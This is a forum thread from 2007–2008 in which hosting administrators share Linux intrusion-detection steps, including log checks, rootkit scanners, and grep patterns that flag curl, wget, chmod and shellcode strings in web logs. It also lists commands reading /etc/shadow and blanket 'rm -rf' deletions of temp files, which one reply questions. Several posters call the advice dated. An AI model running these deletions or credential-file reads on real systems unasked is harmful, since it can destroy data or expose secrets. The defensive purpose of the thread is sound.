Results 1 to 25 of 28
-
05-22-2007, 01:42 AM #1Web Hosting Evangelist
- Join Date
- Apr 2006
- Posts
- 520
How-to detect a possible intruder ¿?
Advise: this are steps recompiled from the network and a from some books, these were not done by me.
Hello..
I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter, so please, post your tips and tricks about this subject.
1.- Download and run Rkhunter & Chkrootkit
2.- Run "w", and "netstat -nalp |grep "SHPORTHERE" to see whos connected using SSH
3.- Search for ssh and ftp accepted logins.
Code:last cat /var/log/secure* | grep ssh | grep Accept cat /var/log/secure* |grep ftp |grep Accept less /var/log/messages | grep ftp
Code:netstat -nalp nmap 1-65535 localhost
Code:rm -rf /tmp/sess* rm -rf /var/dos-* rm -rf /var/tmp/ssh-* rm -rf /var/tmp/dos-* ls /tmp -lab ls /var/tmp -labR ls /dev/shm -labR ls /usr/local/apache/proxy -labR ls /usr/local/samba -labR
Code:less /etc/passwd less /etc/shadow less /etc/groups
Code:cat /etc/sudoers who /var/log/wtmp cat /etc/xinetd.d/telnet
Code:find '/' -iname .bash_history
Code:crontab -l
Code:updatedb &
Code:egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/* egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
Code:egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
Code:cat /path/of/your/web/logs/* |grep "/x90/"
Code:locate "..." locate ".. " rlocate " .." locate ". " locate " ."
Code:ps -aux | grep perl
Code:service httpd stop lsof -u nobody
Last edited by sh4ka; 05-22-2007 at 01:51 AM.
-
05-22-2007, 05:53 AM #2Junior Guru Wannabe
- Join Date
- Oct 2003
- Posts
- 51
Dude, rock'n thread. That was the single most useful thing I've read & as a relative linux noob with security issues, I have had to do a lot of Google'n.
Beauty work. Really. Pretty much what every noob to linux security & bash needs to know to have any sort of "ability" to counter hackers. The bash_history bit was the best. So damn useful.
-
05-22-2007, 06:00 AM #3Web Hosting Evangelist
- Join Date
- Apr 2006
- Posts
- 520
Glad to hear that.
Here there is another tip to track exploits in temp dirs, its a bash script:
Code:#!/bin/bash for x in "/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp"; do ls -loAFR $x 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web " | grep -E "^$|^/|/$|\*$|\.pl$" | tee exploits.txt; done; echo -e "\n\nPossible Exploit Files and Directories: `grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' '`" | tee -a exploits.txt
Last edited by sh4ka; 05-22-2007 at 06:05 AM.
-
05-25-2007, 04:59 AM #4Temporarily Suspended
- Join Date
- Jan 2006
- Posts
- 3
Also try this - ossec.net
-
05-25-2007, 04:37 PM #5Web Hosting Evangelist
- Join Date
- Apr 2006
- Posts
- 520
Cool.., i will test this .
Any other suggestions ?
Thanks
-
05-25-2007, 04:39 PM #6Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
rm -rf /tmp/sess*Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
05-25-2007, 11:35 PM #7Web Hosting Evangelist
- Join Date
- Apr 2006
- Posts
- 520
Oh.. thanks, i will correct that.
-
06-11-2007, 03:37 PM #8New Member
- Join Date
- Jun 2007
- Posts
- 4
nice i will put this to use, lol u did a good job at explaining this.
-
06-13-2007, 11:36 PM #9Junior Guru Wannabe
- Join Date
- May 2004
- Posts
- 98
This is an excellent thread. Bookmarked this one.
-
07-21-2007, 11:13 PM #10Junior Guru Wannabe
- Join Date
- Jun 2006
- Posts
- 67
Thanks, this is very useful
ServerTweak Networks, LLC >> ServerTweak.com
Experience the fastest network and superior servers, feel the power of ServerTweak!
Fremont, CA DataCenter | Dedicated Servers | Colocation | Cross Connects HE.net | 1/4 - Full Cab Sales
-
07-30-2007, 09:10 PM #11New Member
- Join Date
- Jul 2007
- Posts
- 1
great info! thanks
-
09-16-2007, 12:56 AM #12Junior Guru Wannabe
- Join Date
- Sep 2007
- Posts
- 48
How would you compare OSSEC to Osiris?
-
10-19-2007, 12:28 PM #13WHT Addict
- Join Date
- Dec 2004
- Posts
- 104
thanks man.
cat /path/of/your/web/logs/* |grep "/x90/"
What does this thing do?
Is there a script to search my whole server to see if there is a shell file?Chad Michael Murray >> House of Wax
-
01-02-2008, 09:32 PM #14Newbie
- Join Date
- Jan 2008
- Posts
- 6
This is outdated...
This can be easily bypassed using asm or binary lol.....
-
01-13-2008, 10:54 AM #15Newbie
- Join Date
- Dec 2007
- Posts
- 7
thanks! good info!
-
02-10-2008, 03:41 AM #16Newbie
- Join Date
- Jan 2008
- Location
- India
- Posts
- 11
Thanks for such informative thread...It will help many of us
Good jobKeep Smiling !!
-
02-23-2008, 05:09 PM #17Newbie
- Join Date
- Jan 2004
- Posts
- 11
Is there anything that automates doing this on a regular basis & put it off-server (e.g., emails it out)? My fear would be a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.
-
02-23-2008, 06:20 PM #18Web Hosting Evangelist
- Join Date
- Apr 2006
- Posts
- 520
You can always write a shell script and sent results by mail, and believe me, a good cracker already knows about all this stuff.
-
07-24-2008, 02:22 PM #19WHT Addict
- Join Date
- Aug 2004
- Posts
- 142
This is kinda of old
-
07-24-2008, 05:15 PM #20******* Unleaded
- Join Date
- Feb 2004
- Posts
- 3,849
This is kinda of oldedgedirector.com
managed dns global failover and load balance (gslb)
exactstate.com
uptime report for webhostingtalk.com
-
07-25-2008, 06:28 AM #21Aspiring Evangelist
- Join Date
- Aug 2004
- Posts
- 417
This might be an old post but... That line searches files for shell code. Shell code doesn't have anything to do with the Linux shell. It's machine code that an attacker attempts to execute on your server by using scripts or applications called "exploits". Basically, an exploit will attempt to (ab)use a vulnerability in an application (ie: a buffer overflow vulnerability) to inject shell code (ie: code that listens on a port and binds a Linux command line to it) which is then executed by the CPU. For more information I recommend searching Google for the article "Smashing the stack for fun and profit". It's heavy literature for newbies but it's worth reading.
About the OP: Most of the techniques explained above are really basic and will only detect possible attacks by 'newbie script kiddies'. I recommend installing an advanced IDS such as Snort or TripWire. If you're running cPanel, install ConfigServer Firewall since its LFD tool will monitor a lot of things on your server and send you notifications via email if it detects something that you might want to look into. For those who do not use cPanel: Use LSM and BFD from R-fx Networks.
Off course, the best way is to focus on intrusion prevention/avoidance and not only intrusion detection.
-
07-25-2008, 06:33 AM #22Aspiring Evangelist
- Join Date
- May 2007
- Posts
- 442
What is LSM?
BFD = Brute force detection on APF firewall, correct?
-
07-25-2008, 07:28 PM #23WHT Addict
- Join Date
- Dec 2006
- Posts
- 131
Thank you for posting this, guys!
I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotations but it still shows up and won't go away?
I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!
-
07-26-2008, 07:28 AM #24Aspiring Evangelist
- Join Date
- Aug 2004
- Posts
- 417
-
08-17-2008, 03:18 AM #25Aspiring Evangelist
- Join Date
- Jun 2003
- Posts
- 367